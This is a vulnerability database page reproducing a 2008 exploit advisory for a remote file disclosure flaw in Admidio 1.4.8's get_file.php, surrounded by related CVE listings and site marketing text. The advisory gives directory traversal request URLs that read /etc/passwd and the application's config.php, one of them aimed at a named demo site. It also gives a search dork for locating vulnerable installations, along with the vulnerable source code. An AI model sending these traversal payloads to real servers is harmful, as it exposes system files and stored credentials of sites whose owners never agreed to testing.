Lucene search
+L

Admidio 1.4.8 - 'getfile.php' Remote File Disclosure

🗓️ 09 May 2008 00:00:00Reported by n3v3rh00dType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

Admidio 1.4.8 Remote File Disclosure vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-5209
9 May 200800:00
circl
cve
CVE
CVE-2008-5209
24 Nov 200817:00
cve
cvelist
Cvelist
CVE-2008-5209
24 Nov 200817:00
cvelist
euvd
EUVD
EUVD-2008-5186
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-5209
24 Nov 200817:30
nvd
openvas
OpenVAS
Admidio get_file.php Remote File Disclosure Vulnerability
1 Dec 200800:00
openvas
prion
Prion
Directory traversal
24 Nov 200817:30
prion
/---------------------------------------------------------------\
+                                				+
+        	Admidio 1.4.8 Remote File Disclosure            +
+                                				+
\---------------------------------------------------------------/


[*] Author    : n3v3rh00d, http://forum.antichat.ru

[*] Download    : http://prdownloads.sourceforge.net/admidio/admidio-1.4.8.zip

[*] Bug Type    : Remote File Disclosure

[*] Dork    : "Admidio Team"

[*] POC        : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=

[*] Example    : http://demo.admidio.org/adm_program/modules/download/get_file.php?folder=&file=../../adm_config/config.php&default_folder=

[*] Source    :
    ..........................................................

    $file   = strStripTags(urldecode($_GET['file']));
    $act_folder     = "../../../adm_my_files/download";

    ..........................................................

    $file_name   = "$act_folder/$file";
    $file_length = filesize("$act_folder/$file");

    ..........................................................

    header("Content-Type: application/octet-stream");
    header("Content-Length: $file_length");
    header("Content-Disposition: attachment; filename=\"$file\"");

    header('Cache-Control: private');
    readfile($file_name);

# milw0rm.com [2008-05-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 May 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.0276
24